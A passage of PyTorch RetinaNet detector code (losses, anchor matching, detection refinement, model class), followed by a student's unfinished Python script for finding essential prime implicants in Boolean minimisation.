# get positive samples and calculate loss.
if not 0 in pos_indices.size():
pos_indices = pos_indices.squeeze(1)
roi_logits_pos = class_pred_logits[pos_indices]
targets_pos = anchor_matches[pos_indices].detach()
pos_loss = F.cross_entropy(roi_logits_pos, targets_pos.long())
else:
pos_loss = torch.FloatTensor([0]).cuda()
# get negative samples, such that the amount matches the number of positive samples, but at least 1.
# get high scoring negatives by applying online-hard-example-mining.
if not 0 in neg_indices.size():
neg_indices = neg_indices.squeeze(1)
roi_logits_neg = class_pred_logits[neg_indices]
negative_count = np.max((1, pos_indices.cpu().data.numpy().size))
roi_probs_neg = F.softmax(roi_logits_neg, dim=1)
neg_ix = mutils.shem(roi_probs_neg, negative_count, shem_poolsize)
neg_loss = F.cross_entropy(roi_logits_neg[neg_ix], torch.LongTensor([0] * neg_ix.shape[0]).cuda())
# return the indices of negative samples, who contributed to the loss for monitoring plots.
np_neg_ix = neg_ix.cpu().data.numpy()
else:
neg_loss = torch.FloatTensor([0]).cuda()
np_neg_ix = np.array([]).astype('int32')
loss = (pos_loss + neg_loss) / 2
return loss, np_neg_ix
def compute_bbox_loss(target_deltas, pred_deltas, anchor_matches):
"""
:param target_deltas: (b, n_positive_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd)))).
Uses 0 padding to fill in unused bbox deltas.
:param pred_deltas: predicted deltas from bbox regression head. (b, n_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param anchor_matches: tensor (n_anchors). value in [-1, 0, class_ids] for negative, neutral, and positive matched anchors.
i.e., positively matched anchors are marked by class_id >0
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(anchor_matches>0).shape:
indices = torch.nonzero(anchor_matches>0).squeeze(1)
# Pick bbox deltas that contribute to the loss
pred_deltas = pred_deltas[indices]
# Trim target bounding box deltas to the same length as pred_deltas.
target_deltas = target_deltas[:pred_deltas.shape[0], :].detach()
# Smooth L1 loss
loss = F.smooth_l1_loss(pred_deltas, target_deltas)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_rg_loss(tasks, target, pred, anchor_matches):
"""
:param tasks: list of prediction tasks.
:param target: regression targets for positively matched anchors (bin ids for the rg_bin task).
Uses 0 padding to fill in unused targets.
:param pred: predicted regression values for all anchors. (n_anchors, n_rg_feats)
:param anchor_matches: (n_anchors). [-1, 0, class_id] for negative, neutral, and positively matched anchors.
:return: loss: torch 1D tensor.
"""
if not 0 in target.shape and not 0 in torch.nonzero(anchor_matches>0).shape:
indices = torch.nonzero(anchor_matches>0).squeeze(1)
# Pick rgs that contribute to the loss
pred = pred[indices]
# Trim target
target = target[:pred.shape[0]].detach()
if 'regression_bin' in tasks:
loss = F.cross_entropy(pred, target.long())
else:
loss = F.smooth_l1_loss(pred, target)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_focal_class_loss(anchor_matches, class_pred_logits, gamma=2.):
""" Focal Loss FL = -(1-q)^g log(q) with q = pred class probability.
:param anchor_matches: (n_anchors). [-1, 0, class] for negative, neutral, and positive matched anchors.
:param class_pred_logits: (n_anchors, n_classes). logits from classifier sub-network.
:param gamma: g in above formula, good results with g=2 in original paper.
:return: loss: torch 1D tensor (focal loss averaged over the considered anchors).
"""
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
pos_indices = torch.nonzero(anchor_matches > 0).squeeze(-1) # dim=-1 instead of 1 or 0 to cover empty matches.
neg_indices = torch.nonzero(anchor_matches == -1).squeeze(-1)
target_classes = torch.cat( (anchor_matches[pos_indices].long(), torch.LongTensor([0] * neg_indices.shape[0]).cuda()) )
non_neutral_indices = torch.cat( (pos_indices, neg_indices) )
q = F.softmax(class_pred_logits[non_neutral_indices], dim=1) # q shape: (n_non_neutral_anchors, n_classes)
# one-hot style gathering: keep only the predicted prob of the target class; the loss pushes it toward 1.
# log(q_i) where i = target class --> FL shape (n_anchors,)
# need to transform to indices into flattened tensor to use torch.take
target_locs_flat = q.shape[1] * torch.arange(q.shape[0]).cuda() + target_classes
q = torch.take(q, target_locs_flat)
FL = torch.log(q) # element-wise log
FL *= -(1-q)**gamma
# take mean over all considered anchors
FL = FL.sum() / FL.shape[0]
return FL
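# Illustration: a minimal CPU-only sketch of how the (1 - q)**gamma factor in the focal loss above
# down-weights easy examples. Probabilities are hypothetical.
def _demo_focal_weighting(gamma=2.):
    q_easy, q_hard = torch.tensor(0.95), torch.tensor(0.30)  # predicted prob of the true class
    fl_easy = -(1 - q_easy) ** gamma * torch.log(q_easy)     # ~1.3e-4: barely contributes
    fl_hard = -(1 - q_hard) ** gamma * torch.log(q_hard)     # ~0.59: dominates the loss
    return fl_easy, fl_hard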
def refine_detections(anchors, probs, deltas, regressions, batch_ixs, cf):
"""Refine classified proposals, filter overlaps and return final
detections. n_proposals here is typically a very large number: batch_size * n_anchors.
This function is hence optimized for trimming down n_proposals.
:param anchors: (n_anchors, 2 * dim)
:param probs: (n_proposals, n_classes) softmax probabilities for all rois as predicted by classifier head.
:param deltas: (n_proposals, n_classes, 2 * dim) box refinement deltas as predicted by bbox regressor head.
:param regressions: (n_proposals, n_classes, n_rg_feats)
:param batch_ixs: (n_proposals) batch element assignment info for re-allocation.
:return: result: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score, pred_regr))
"""
anchors = anchors.repeat(batch_ixs.unique().shape[0], 1)
#flatten foreground probabilities, sort and trim down to highest confidences by pre_nms limit.
fg_probs = probs[:, 1:].contiguous()
flat_probs, flat_probs_order = fg_probs.view(-1).sort(descending=True)
keep_ix = flat_probs_order[:cf.pre_nms_limit]
# reshape indices to 2D index array with shape like fg_probs.
keep_arr = torch.cat(((keep_ix / fg_probs.shape[1]).unsqueeze(1), (keep_ix % fg_probs.shape[1]).unsqueeze(1)), 1)
pre_nms_scores = flat_probs[:cf.pre_nms_limit]
pre_nms_class_ids = keep_arr[:, 1] + 1 # add background again.
pre_nms_batch_ixs = batch_ixs[keep_arr[:, 0]]
pre_nms_anchors = anchors[keep_arr[:, 0]]
pre_nms_deltas = deltas[keep_arr[:, 0]]
pre_nms_regressions = regressions[keep_arr[:, 0]]
keep = torch.arange(pre_nms_scores.size()[0]).long().cuda()
# apply bounding box deltas. re-scale to image coordinates.
std_dev = torch.from_numpy(np.reshape(cf.rpn_bbox_std_dev, [1, cf.dim * 2])).float().cuda()
scale = torch.from_numpy(cf.scale).float().cuda()
refined_rois = mutils.apply_box_deltas_2D(pre_nms_anchors / scale, pre_nms_deltas * std_dev) * scale \
if cf.dim == 2 else mutils.apply_box_deltas_3D(pre_nms_anchors / scale, pre_nms_deltas * std_dev) * scale
# round and cast to int since we're dealing with pixels now
refined_rois = mutils.clip_to_window(cf.window, refined_rois)
pre_nms_rois = torch.round(refined_rois)
for j, b in enumerate(mutils.unique1d(pre_nms_batch_ixs)):
bixs = torch.nonzero(pre_nms_batch_ixs == b)[:, 0]
bix_class_ids = pre_nms_class_ids[bixs]
bix_rois = pre_nms_rois[bixs]
bix_scores = pre_nms_scores[bixs]
for i, class_id in enumerate(mutils.unique1d(bix_class_ids)):
ixs = torch.nonzero(bix_class_ids == class_id)[:, 0]
# nms expects boxes sorted by score.
ix_rois = bix_rois[ixs]
ix_scores = bix_scores[ixs]
ix_scores, order = ix_scores.sort(descending=True)
ix_rois = ix_rois[order, :]
ix_scores = ix_scores
class_keep = nms.nms(ix_rois, ix_scores, cf.detection_nms_threshold)
# map indices back.
class_keep = keep[bixs[ixs[order[class_keep]]]]
# merge indices over classes for current batch element
b_keep = class_keep if i == 0 else mutils.unique1d(torch.cat((b_keep, class_keep)))
# only keep top-k boxes of current batch-element.
top_ids = pre_nms_scores[b_keep].sort(descending=True)[1][:cf.model_max_instances_per_batch_element]
b_keep = b_keep[top_ids]
# merge indices over batch elements.
batch_keep = b_keep if j == 0 else mutils.unique1d(torch.cat((batch_keep, b_keep)))
keep = batch_keep
# arrange output.
result = torch.cat((pre_nms_rois[keep],
pre_nms_batch_ixs[keep].unsqueeze(1).float(),
pre_nms_class_ids[keep].unsqueeze(1).float(),
pre_nms_scores[keep].unsqueeze(1),
pre_nms_regressions[keep]), dim=1)
return result
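# Illustration: the per-batch-element, per-class NMS loop above can be sketched with torchvision's
# batched_nms, assuming torchvision is installed (this repo itself uses its custom nms extension).
# Coordinates follow torchvision's (x1, y1, x2, y2) convention and are hypothetical.
def _demo_per_class_nms(iou_thresh=0.5):
    from torchvision.ops import batched_nms
    boxes = torch.tensor([[0., 0., 10., 10.], [1., 1., 11., 11.], [20., 20., 30., 30.]])
    scores = torch.tensor([0.9, 0.8, 0.7])
    class_ids = torch.tensor([1, 1, 2])  # suppression only happens within the same class
    return batched_nms(boxes, scores, class_ids, iou_thresh)  # -> tensor([0, 2])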
def gt_anchor_matching(cf, anchors, gt_boxes, gt_class_ids=None, gt_regressions=None):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2, (z1), (z2))]
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2, (z1), (z2))]
gt_class_ids (optional): [num_gt_boxes] Integer class IDs for one stage detectors. in RPN case of Mask R-CNN,
set all positive matches to 1 (foreground)
gt_regressions: [num_gt_rgs, n_rg_feats], if None empty rg_targets are returned
Returns:
anchor_class_matches: [N] (int32) matches between anchors and GT boxes. class_id = positive anchor,
-1 = negative anchor, 0 = neutral. i.e., positively matched anchors are marked by class_id (which is >0).
anchor_delta_targets: [N, (dy, dx, (dz), log(dh), log(dw), (log(dd)))] Anchor bbox deltas.
anchor_rg_targets: [n_anchors, n_rg_feats]
"""
anchor_class_matches = np.zeros([anchors.shape[0]], dtype=np.int32)
anchor_delta_targets = np.zeros((cf.rpn_train_anchors_per_image, 2*cf.dim))
if gt_regressions is not None:
if 'regression_bin' in cf.prediction_tasks:
anchor_rg_targets = np.zeros((cf.rpn_train_anchors_per_image,))
else:
anchor_rg_targets = np.zeros((cf.rpn_train_anchors_per_image, cf.regression_n_features))
else:
anchor_rg_targets = np.array([])
anchor_matching_iou = cf.anchor_matching_iou
if gt_boxes is None:
anchor_class_matches = np.full(anchor_class_matches.shape, fill_value=-1)
return anchor_class_matches, anchor_delta_targets, anchor_rg_targets
# for mrcnn: anchor matching is done for RPN loss, so positive labels are all 1 (foreground)
if gt_class_ids is None:
gt_class_ids = np.array([1] * len(gt_boxes))
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = mutils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= anchor_matching_iou then it's positive.
# If an anchor overlaps a GT box with IoU < 0.1 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.1).
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
if anchors.shape[1] == 4:
anchor_class_matches[(anchor_iou_max < 0.1)] = -1
elif anchors.shape[1] == 6:
anchor_class_matches[(anchor_iou_max < 0.01)] = -1
else:
raise ValueError('anchor shape wrong {}'.format(anchors.shape))
# 2. Set an anchor for each GT box (regardless of IoU value).
gt_iou_argmax = np.argmax(overlaps, axis=0)
for ix, ii in enumerate(gt_iou_argmax):
anchor_class_matches[ii] = gt_class_ids[ix]
# 3. Set anchors with high overlap as positive.
above_thresh_ixs = np.argwhere(anchor_iou_max >= anchor_matching_iou)
anchor_class_matches[above_thresh_ixs] = gt_class_ids[anchor_iou_argmax[above_thresh_ixs]]
# Subsample to balance positive anchors.
ids = np.where(anchor_class_matches > 0)[0]
extra = len(ids) - (cf.rpn_train_anchors_per_image // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
anchor_class_matches[ids] = 0
# Leave all negative proposals negative for now and sample from them later in online hard example mining.
# For positive anchors, compute shift and scale needed to transform them to match the corresponding GT boxes.
ids = np.where(anchor_class_matches > 0)[0]
ix = 0 # index into anchor_delta_targets
for i, a in zip(ids, anchors[ids]):
# closest gt box (it might have IoU < anchor_matching_iou)
gt = gt_boxes[anchor_iou_argmax[i]]
# convert coordinates to center plus width/height.
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
if cf.dim == 2:
anchor_delta_targets[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w)]
else:
gt_d = gt[5] - gt[4]
gt_center_z = gt[4] + 0.5 * gt_d
a_d = a[5] - a[4]
a_center_z = a[4] + 0.5 * a_d
anchor_delta_targets[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
(gt_center_z - a_center_z) / a_d,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
np.log(gt_d / a_d)]
# normalize.
anchor_delta_targets[ix] /= cf.rpn_bbox_std_dev
if gt_regressions is not None:
anchor_rg_targets[ix] = gt_regressions[anchor_iou_argmax[i]]
ix += 1
return anchor_class_matches, anchor_delta_targets, anchor_rg_targets
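# Illustration: a minimal sketch of the 2D delta targets computed above for a single (anchor, gt)
# pair, with hypothetical (y1, x1, y2, x2) coordinates.
def _demo_anchor_deltas_2d():
    a = np.array([10., 10., 50., 50.])   # anchor: 40 x 40, center (30, 30)
    gt = np.array([12., 8., 52., 56.])   # gt box: 40 x 48, center (32, 32)
    a_h, a_w = a[2] - a[0], a[3] - a[1]
    gt_h, gt_w = gt[2] - gt[0], gt[3] - gt[1]
    dy = ((gt[0] + 0.5 * gt_h) - (a[0] + 0.5 * a_h)) / a_h  # 0.05
    dx = ((gt[1] + 0.5 * gt_w) - (a[1] + 0.5 * a_w)) / a_w  # 0.05
    dh, dw = np.log(gt_h / a_h), np.log(gt_w / a_w)         # 0.0, ~0.182
    return np.array([dy, dx, dh, dw])  # still to be divided by cf.rpn_bbox_std_dev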
############################################################
# RetinaNet Class
############################################################
class net(nn.Module):
"""Encapsulates the RetinaNet model functionality.
"""
def __init__(self, cf, logger):
"""
cf: configuration (sub-)class instance
logger: logger to write training and model information to
"""
super(net, self).__init__()
self.cf = cf
self.logger = logger
self.build()
if self.cf.weight_init is not None:
logger.info("using pytorch weight init of type {}".format(self.cf.weight_init))
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
self.debug_acm = []
def build(self):
"""Build Retina Net architecture."""
# Image size must be divisible by 2 multiple times.
h, w = self.cf.patch_size[:2]
if h / 2 ** 5 != int(h / 2 ** 5) or w / 2 ** 5 != int(w / 2 ** 5):
raise Exception("Image size must be divisible by 2 at least 5 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
backbone = utils.import_module('bbone', self.cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv = backbone.ConvGenerator(self.cf.dim)
# build Anchors, FPN, Classifier / Bbox-Regressor -head
self.np_anchors = mutils.generate_pyramid_anchors(self.logger, self.cf)
self.anchors = torch.from_numpy(self.np_anchors).float().cuda()
self.fpn = backbone.FPN(self.cf, conv, operate_stride1=self.cf.operate_stride1).cuda()
self.classifier = Classifier(self.cf, conv).cuda()
self.bb_regressor = BBRegressor(self.cf, conv).cuda()
if 'regression' in self.cf.prediction_tasks:
self.roi_regressor = RoIRegressor(self.cf, conv, self.cf.regression_n_features).cuda()
elif 'regression_bin' in self.cf.prediction_tasks:
# classify into bins of regression values
self.roi_regressor = RoIRegressor(self.cf, conv, len(self.cf.bin_labels)).cuda()
else:
self.roi_regressor = lambda x: [torch.tensor([]).cuda()]
if self.cf.model == 'retina_unet':
self.final_conv = conv(self.cf.end_filts, self.cf.num_seg_classes, ks=1, pad=0, norm=None, relu=None)
def forward(self, img):
"""
:param img: input img (b, c, y, x, (z)).
"""
# Feature extraction
fpn_outs = self.fpn(img)
if self.cf.model == 'retina_unet':
seg_logits = self.final_conv(fpn_outs[0])
selected_fmaps = [fpn_outs[i + 1] for i in self.cf.pyramid_levels]
else:
seg_logits = None
selected_fmaps = [fpn_outs[i] for i in self.cf.pyramid_levels]
# Loop through pyramid layers
class_layer_outputs, bb_reg_layer_outputs, roi_reg_layer_outputs = [], [], [] # list of lists
for p in selected_fmaps:
class_layer_outputs.append(self.classifier(p))
bb_reg_layer_outputs.append(self.bb_regressor(p))
roi_reg_layer_outputs.append(self.roi_regressor(p))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
class_logits = list(zip(*class_layer_outputs))
class_logits = [torch.cat(list(o), dim=1) for o in class_logits][0]
bb_outputs = list(zip(*bb_reg_layer_outputs))
bb_outputs = [torch.cat(list(o), dim=1) for o in bb_outputs][0]
if not 0 == roi_reg_layer_outputs[0][0].shape[0]:
rg_outputs = list(zip(*roi_reg_layer_outputs))
rg_outputs = [torch.cat(list(o), dim=1) for o in rg_outputs][0]
else:
if self.cf.dim == 2:
n_feats = np.array([p.shape[-2] * p.shape[-1] * self.cf.n_anchors_per_pos for p in selected_fmaps]).sum()
else:
n_feats = np.array([p.shape[-3]*p.shape[-2]*p.shape[-1]*self.cf.n_anchors_per_pos for p in selected_fmaps]).sum()
rg_outputs = torch.zeros((selected_fmaps[0].shape[0], n_feats, self.cf.regression_n_features),
dtype=torch.float32).fill_(float('NaN')).cuda()
# merge batch_dimension and store info in batch_ixs for re-allocation.
batch_ixs = torch.arange(class_logits.shape[0]).unsqueeze(1).repeat(1, class_logits.shape[1]).view(-1).cuda()
flat_class_softmax = F.softmax(class_logits.view(-1, class_logits.shape[-1]), 1)
flat_bb_outputs = bb_outputs.view(-1, bb_outputs.shape[-1])
flat_rg_outputs = rg_outputs.view(-1, rg_outputs.shape[-1])
detections = refine_detections(self.anchors, flat_class_softmax, flat_bb_outputs, flat_rg_outputs, batch_ixs,
self.cf)
return detections, class_logits, bb_outputs, rg_outputs, seg_logits
def get_results(self, img_shape, detections, seg_logits, box_results_list=None):
"""
Restores batch dimension of merged detections, unmolds detections, creates and fills results dict.
:param img_shape:
:param detections: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score,
pred_regression)
:param box_results_list: None or list of output boxes for monitoring/plotting.
each element is a list of boxes per batch element.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, 1] only fg. vs. bg for now.
class-specific return of masks will come with implementation of instance segmentation evaluation.
"""
detections = detections.cpu().data.numpy()
batch_ixs = detections[:, self.cf.dim*2]
detections = [detections[batch_ixs == ix] for ix in range(img_shape[0])]
if box_results_list is None: # for test_forward, where no previous list exists.
box_results_list = [[] for _ in range(img_shape[0])]
for ix in range(img_shape[0]):
if not 0 in detections[ix].shape:
boxes = detections[ix][:, :2 * self.cf.dim].astype(np.int32)
class_ids = detections[ix][:, 2 * self.cf.dim + 1].astype(np.int32)
scores = detections[ix][:, 2 * self.cf.dim + 2]
regressions = detections[ix][:, 2 * self.cf.dim + 3:]
# Filter out detections with zero area. Often only happens in early
# stages of training when the network weights are still a bit random.
if self.cf.dim == 2:
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
else:
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 5] - boxes[:, 4]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
regressions = np.delete(regressions, exclude_ix, axis=0)
if not 0 in boxes.shape:
for ix2, score in enumerate(scores):
if score >= self.cf.model_min_confidence:
box = {'box_type': 'det', 'box_coords': boxes[ix2], 'box_score': score,
'box_pred_class_id': class_ids[ix2]}
if "regression_bin" in self.cf.prediction_tasks:
# in this case, regression preds are actually the rg_bin_ids --> map to rg value the bin stands for
box['rg_bin'] = regressions[ix2].argmax()
box['regression'] = self.cf.bin_id2rg_val[box['rg_bin']]
else:
box['regression'] = regressions[ix2]
if hasattr(self.cf, "rg_val_to_bin_id") and \
any(['regression' in task for task in self.cf.prediction_tasks]):
box['rg_bin'] = self.cf.rg_val_to_bin_id(regressions[ix2])
box_results_list[ix].append(box)
results_dict = {}
results_dict['boxes'] = box_results_list
if seg_logits is None:
# output dummy segmentation for retina_net.
out_logits_shape = list(img_shape)
out_logits_shape[1] = self.cf.num_seg_classes
results_dict['seg_preds'] = np.zeros(out_logits_shape, dtype=np.float16)
#todo: try with seg_preds=None? as to not carry heavy dummy preds.
else:
# output label maps for retina_unet.
results_dict['seg_preds'] = F.softmax(seg_logits, 1).cpu().data.numpy()
return results_dict
def train_forward(self, batch, is_validation=False):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixelwise segmentation output (b, c, y, x, (z)) with values [0, .., n_classes].
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring.
"""
img = batch['data']
gt_class_ids = batch['class_targets']
gt_boxes = batch['bb_target']
if 'regression' in self.cf.prediction_tasks:
gt_regressions = batch["regression_targets"]
elif 'regression_bin' in self.cf.prediction_tasks:
gt_regressions = batch["rg_bin_targets"]
else:
gt_regressions = None
if self.cf.model == 'retina_unet':
var_seg_ohe = torch.FloatTensor(mutils.get_one_hot_encoding(batch['seg'], self.cf.num_seg_classes)).cuda()
var_seg = torch.LongTensor(batch['seg']).cuda()
img = torch.from_numpy(img).float().cuda()
torch_loss = torch.FloatTensor([0]).cuda()
# list of output boxes for monitoring/plotting. each element is a list of boxes per batch element.
box_results_list = [[] for _ in range(img.shape[0])]
detections, class_logits, pred_deltas, pred_rgs, seg_logits = self.forward(img)
# loop over batch
for b in range(img.shape[0]):
# add gt boxes to results dict for monitoring.
if len(gt_boxes[b]) > 0:
for tix in range(len(gt_boxes[b])):
gt_box = {'box_type': 'gt', 'box_coords': batch['bb_target'][b][tix]}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][b][tix]})
box_results_list[b].append(gt_box)
# match gt boxes with anchors to generate targets.
anchor_class_match, anchor_target_deltas, anchor_target_rgs = gt_anchor_matching(
self.cf, self.np_anchors, gt_boxes[b], gt_class_ids[b], gt_regressions[b] if gt_regressions is not None else None)
# add positive anchors used for loss to results_dict for monitoring.
pos_anchors = mutils.clip_boxes_numpy(
self.np_anchors[np.argwhere(anchor_class_match > 0)][:, 0], img.shape[2:])
for p in pos_anchors:
box_results_list[b].append({'box_coords': p, 'box_type': 'pos_anchor'})
else:
anchor_class_match = np.array([-1]*self.np_anchors.shape[0])
anchor_target_deltas = np.array([])
anchor_target_rgs = np.array([])
anchor_class_match = torch.from_numpy(anchor_class_match).cuda()
anchor_target_deltas = torch.from_numpy(anchor_target_deltas).float().cuda()
anchor_target_rgs = torch.from_numpy(anchor_target_rgs).float().cuda()
if self.cf.focal_loss:
# compute class loss as focal loss as suggested in original publication, but multi-class.
class_loss = compute_focal_class_loss(anchor_class_match, class_logits[b], gamma=self.cf.focal_loss_gamma)
# negative anchors are not appended to the monitoring output here, as they are not really relevant
else:
# compute class loss with SHEM.
class_loss, neg_anchor_ix = compute_class_loss(anchor_class_match, class_logits[b])
# add negative anchors used for loss to results_dict for monitoring.
neg_anchors = mutils.clip_boxes_numpy(
self.np_anchors[np.argwhere(anchor_class_match.cpu().numpy() == -1)][neg_anchor_ix, 0],
img.shape[2:])
for n in neg_anchors:
box_results_list[b].append({'box_coords': n, 'box_type': 'neg_anchor'})
rg_loss = compute_rg_loss(self.cf.prediction_tasks, anchor_target_rgs, pred_rgs[b], anchor_class_match)
bbox_loss = compute_bbox_loss(anchor_target_deltas, pred_deltas[b], anchor_class_match)
torch_loss += (class_loss + bbox_loss + rg_loss) / img.shape[0]
results_dict = self.get_results(img.shape, detections, seg_logits, box_results_list)
results_dict['seg_preds'] = results_dict['seg_preds'].argmax(axis=1).astype('uint8')[:, np.newaxis]
if self.cf.model == 'retina_unet':
seg_loss_dice = 1 - mutils.batch_dice(F.softmax(seg_logits, dim=1),var_seg_ohe)
seg_loss_ce = F.cross_entropy(seg_logits, var_seg[:, 0])
torch_loss += (seg_loss_dice + seg_loss_ce) / 2
#self.logger.info("loss: {0:.2f}, class: {1:.2f}, bbox: {2:.2f}, seg dice: {3:.3f}, seg ce: {4:.3f}, "
# "mean pixel preds: {5:.5f}".format(torch_loss.item(), batch_class_loss.item(), batch_bbox_loss.item(),
# seg_loss_dice.item(), seg_loss_ce.item(), np.mean(results_dict['seg_preds'])))
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(
results_dict['seg_preds'], batch["seg"], self.cf.num_seg_classes, convert_to_ohe=True)
#else:
#self.logger.info("loss: {0:.2f}, class: {1:.2f}, bbox: {2:.2f}".format(
# torch_loss.item(), class_loss.item(), bbox_loss.item()))
results_dict['torch_loss'] = torch_loss
results_dict['class_loss'] = class_loss.item()
return results_dict
def test_forward(self, batch, **kwargs):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': here still contains the pixel-wise seg probabilities; they are reduced to hard predictions (via argmax) later in the predictor.
For the plain retina net (detection only) these are dummy seg logits.
"""
img = torch.from_numpy(batch['data']).float().cuda()
detections, _, _, _, seg_logits = self.forward(img)
results_dict = self.get_results(img.shape, detections, seg_logits)
return results_dict
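# Hedged usage sketch (illustrative only): `net`, `batch` and `log` below are assumptions,
# not defined in this file; it only shows how the dictionaries documented above are
# typically consumed by a surrounding trainer.
#
#   results = net.train_forward(batch)
#   results['torch_loss'].backward()        # 1D torch tensor used for backprop
#   log(results['class_loss'])              # python float, monitoring only
#   preds = net.test_forward(batch)         # no ground truth required
#   boxes_b0 = preds['boxes'][0]            # list of box dicts for batch element 0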
``` |
{
"source": "JINI7001/APTP2022",
"score": 4
} |
#### File: JINI7001/APTP2022/APTP2022_daeun.py
```python
'''
bin_list = ["abc", "a'b"]
n = 2
def binary_to_num(n, binary):
i = 0
askii_num = 97
while (i < n):
chr(askii_num) = 2**(n-i-1)
askii_num += 1
i+= 1
for alphabet in bin_list:
a =
num =
for binary_alp in bin_list:
bin_list = binary_to_num(n, binary_alp)
'''
###################################bool_to_minterm##############################################
#######################################다은이#############################################
# Final goal: build the minimum SOP
# Plan: find the essential prime implicants first
inputlist = [[[1,5],"a'c'd"],[[5,7],"a'cd"],[[6,7],"a'bc"],[[0,1,8,9],"b'c'"],[[0,2,8,10],"b'd'"],[[2,6,10,14],"cd'"]]
def findminsop(list):
listt = list
lista = []
listb = []
cov = []
for i in listt:
temp = i[0]
lista.append(i[0])
listb.append(i[1])
for k in temp:
if k not in cov:
cov.append(k)
print(lista) #[[1, 5], [5, 7], [6, 7], [0, 1, 8, 9], [0, 2, 8, 10], [2, 6, 10, 14]]
print(listb) #["a'c'd", "a'c'd", "a'c'd", "b'c'", "b'd'", "cd'"]
print(cov) #[1, 5, 7, 6, 0, 8, 9, 2, 10, 14]
nu = 0
fies =[]
while nu<len(cov):
fies.append(0)
nu = nu+1
print(fies) #[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
# find the essential prime implicants
for i in lista:
for k in i:
a = 0
while a<len(cov):
if k == cov[a]:
fies[a] = fies[a] + 1
a = a+1
print(fies) #[2, 2, 2, 2, 2, 2, 1, 2, 2, 1]
a = 0
essu = []
noessu=[]
while a< len(fies):
if fies[a] == 1:
essu.append(cov[a])
else:
noessu.append(cov[a])
a = a+1
essentialimplicant = []
b = 0
while b<len(lista):
for i in lista[b]:
if i in essu:
essentialimplicant.append(listb[b])
b = b+1
for i in essentialimplicant:
listb.remove(i)
# remaining implicant terms, as literals
c = 0
already = []
for i in lista:
for k in i:
for j in essu:
if k == j:
already.append(i)
lista.remove(i)
print("essential implicant =", essentialimplicant)
print("essential implicant num =", already)
print(listb) # remaining implicants, as literal strings
print(lista) # remaining implicants, as minterm-number lists
print(noessu) # minterms that still have to be covered
print("==============")
al = []
for i in already:
for j in i:
al.append(j)
if j in noessu:
noessu.remove(j)
##################### remove the ones already covered by the essentials ##################
b = 0
while b< len(lista):
jud = 0
for m in lista[b]:
if m in al:
jud = jud+1
if jud == len(lista[b]):
lista.remove(lista[b])
listb.remove(listb[b])
b = b+1
print(noessu) # minterm numbers that still need to be covered
print(listb) # implicants not covered by the essentials, as literals
print(lista) # implicants not covered by the essentials, as minterm numbers
print("==============")
last = []
b = 0
### quick-and-dirty Petrick's method ###
k = 0
while b<len(lista):
ovl = 0
for i in lista[b]:
if i in noessu:
